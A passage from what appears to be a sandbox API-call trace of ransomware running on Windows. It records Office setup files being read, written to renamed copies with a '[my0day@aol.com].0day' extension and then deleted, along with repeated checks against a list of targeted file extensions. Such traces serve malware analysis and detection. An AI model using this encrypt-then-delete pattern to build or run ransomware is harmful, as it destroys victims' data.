lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x545, lpOverlapped=0x0) returned 1 [0035.758] WriteFile (in: hFile=0x1b8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x550, lpOverlapped=0x0) returned 1 [0035.759] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.759] WriteFile (in: hFile=0x1b8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0035.759] SetEndOfFile (hFile=0x1b8) returned 1 [0035.759] CloseHandle (hObject=0x1b8) returned 1 [0035.760] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.760] SetEndOfFile (hFile=0x1a0) returned 1 [0035.760] CloseHandle (hObject=0x1a0) returned 1 [0035.760] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.761] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0035.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.761] lstrlenW (lpString=".doc") returned 4 [0035.761] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.761] lstrlenW (lpString=".docx") returned 5 [0035.761] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.761] lstrlenW (lpString=".pdf") returned 4 [0035.761] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.761] lstrlenW (lpString=".xls") returned 4 [0035.761] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.761] lstrlenW (lpString=".xlsx") returned 5 [0035.761] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.761] lstrlenW (lpString=".ppt") returned 4 [0035.761] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.761] lstrlenW (lpString=".zip") returned 4 [0035.761] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.761] lstrlenW (lpString=".rar") returned 4 [0035.761] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.761] lstrlenW (lpString=".bz2") returned 4 [0035.761] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.761] lstrlenW (lpString=".7z") returned 3 [0035.761] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.761] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString=".dbf") returned 4 [0035.762] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString=".1cd") returned 4 [0035.762] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString=".jpg") returned 4 [0035.762] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString=".doc") returned 4 [0035.762] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString=".docx") returned 5 [0035.762] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.762] lstrlenW (lpString=".pdf") returned 4 [0035.762] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString=".xls") returned 4 [0035.762] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString=".xlsx") returned 5 [0035.762] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.762] lstrlenW (lpString=".ppt") returned 4 [0035.762] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString=".zip") returned 4 [0035.762] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.762] lstrlenW (lpString=".rar") returned 4 [0035.762] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString=".bz2") returned 4 [0035.762] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.762] lstrlenW (lpString=".7z") returned 3 [0035.762] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.762] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.762] lstrlenW (lpString=".dbf") returned 4 [0035.762] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.763] lstrlenW (lpString=".1cd") returned 4 [0035.763] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0035.763] lstrlenW (lpString=".jpg") returned 4 [0035.763] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.763] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.763] lstrlenW (lpString="Setup.xml") returned 9 [0035.763] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.912] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=31094) returned 1 [0035.912] CloseHandle (hObject=0x1a8) returned 1 [0035.912] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.912] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.912] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.912] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.912] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.912] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0036.434] GetLastError () returned 0x0 [0036.434] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x7976, lpOverlapped=0x0) returned 1 [0036.611] WriteFile (in: hFile=0x1c4, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7980, lpOverlapped=0x0) returned 1 [0036.896] ReadFile (in: hFile=0x1a8, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.897] WriteFile (in: hFile=0x1c4, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.897] SetEndOfFile (hFile=0x1c4) returned 1 [0036.897] CloseHandle (hObject=0x1c4) returned 1 [0036.898] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.898] SetEndOfFile (hFile=0x1a8) returned 1 [0036.899] CloseHandle (hObject=0x1a8) returned 1 [0036.899] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0036.899] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.899] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString=".doc") returned 4 [0036.900] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString=".docx") returned 5 [0036.900] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.900] lstrlenW (lpString=".pdf") returned 4 [0036.900] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString=".xls") returned 4 [0036.900] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString=".xlsx") returned 5 [0036.900] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.900] lstrlenW (lpString=".ppt") returned 4 [0036.900] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString=".zip") returned 4 [0036.900] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.900] lstrlenW (lpString=".rar") returned 4 [0036.900] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString=".bz2") returned 4 [0036.900] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString=".7z") returned 3 [0036.900] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString=".dbf") returned 4 [0036.900] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString=".1cd") returned 4 [0036.900] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString=".jpg") returned 4 [0036.900] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.900] lstrlenW (lpString=".doc") returned 4 [0036.901] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString=".docx") returned 5 [0036.901] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.901] lstrlenW (lpString=".pdf") returned 4 [0036.901] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString=".xls") returned 4 [0036.901] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString=".xlsx") returned 5 [0036.901] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.901] lstrlenW (lpString=".ppt") returned 4 [0036.901] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.901] lstrlenW (lpString=".zip") returned 4 [0036.901] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.901] lstrlenW (lpString=".rar") returned 4 [0036.901] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString=".bz2") returned 4 [0036.901] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString=".7z") returned 3 [0036.901] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.901] lstrlenW (lpString=".dbf") returned 4 [0036.901] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.901] lstrlenW (lpString=".1cd") returned 4 [0036.901] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.901] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.901] lstrlenW (lpString=".jpg") returned 4 [0036.901] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.901] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0036.901] lstrlenW (lpString="ipsesp.xml") returned 10 [0036.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.178] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=3024) returned 1 [0037.178] CloseHandle (hObject=0x170) returned 1 [0037.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0x20 [0037.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.178] lstrlenW (lpString=".doc") returned 4 [0037.178] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.178] lstrlenW (lpString=".docx") returned 5 [0037.178] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.178] lstrlenW (lpString=".pdf") returned 4 [0037.179] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString=".xls") returned 4 [0037.179] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString=".xlsx") returned 5 [0037.179] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.179] lstrlenW (lpString=".ppt") returned 4 [0037.179] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.179] lstrlenW (lpString=".zip") returned 4 [0037.179] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.179] lstrlenW (lpString=".rar") returned 4 [0037.179] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString=".bz2") returned 4 [0037.179] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString=".7z") returned 3 [0037.179] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.179] lstrlenW (lpString=".dbf") returned 4 [0037.179] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.179] lstrlenW (lpString=".1cd") returned 4 [0037.179] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.179] lstrlenW (lpString=".jpg") returned 4 [0037.179] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.179] lstrlenW (lpString=".doc") returned 4 [0037.179] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.179] lstrlenW (lpString=".docx") returned 5 [0037.179] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.179] lstrlenW (lpString=".pdf") returned 4 [0037.179] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString=".xls") returned 4 [0037.180] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString=".xlsx") returned 5 [0037.180] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.180] lstrlenW (lpString=".ppt") returned 4 [0037.180] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.180] lstrlenW (lpString=".zip") returned 4 [0037.180] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.180] lstrlenW (lpString=".rar") returned 4 [0037.180] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString=".bz2") returned 4 [0037.180] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString=".7z") returned 3 [0037.180] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.180] lstrlenW (lpString=".dbf") returned 4 [0037.180] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.180] lstrlenW (lpString=".1cd") returned 4 [0037.180] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61 [0037.180] lstrlenW (lpString=".jpg") returned 4 [0037.180] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.180] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0037.180] lstrlenW (lpString="AccessMUI.XML") returned 13 [0037.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.181] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1349) returned 1 [0037.181] CloseHandle (hObject=0x170) returned 1 [0037.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 0x20 [0037.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0037.182] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.182] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.182] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.182] GetLastError () returned 0x0 [0037.182] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x545, lpOverlapped=0x0) returned 1 [0037.184] WriteFile (in: hFile=0x1bc, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x550, lpOverlapped=0x0) returned 1 [0037.185] ReadFile (in: hFile=0x170, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.185] WriteFile (in: hFile=0x1bc, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0037.185] SetEndOfFile (hFile=0x1bc) returned 1 [0037.185] CloseHandle (hObject=0x1bc) returned 1 [0037.186] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.186] SetEndOfFile (hFile=0x170) returned 1 [0037.186] CloseHandle (hObject=0x170) returned 1 [0037.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0037.187] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1 [0037.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.187] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0037.187] lstrlenW (lpString=".doc") returned 4 [0037.187] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.187] lstrlenW (lpString=".docx") returned 5 [0037.187] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.187] lstrlenW (lpString=".pdf") returned 4 [0037.187] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.187] lstrlenW (lpString=".xls") returned 4 [0037.187] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.187] lstrlenW (lpString=".xlsx") returned 5 [0037.187] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.187] lstrlenW (lpString=".ppt") 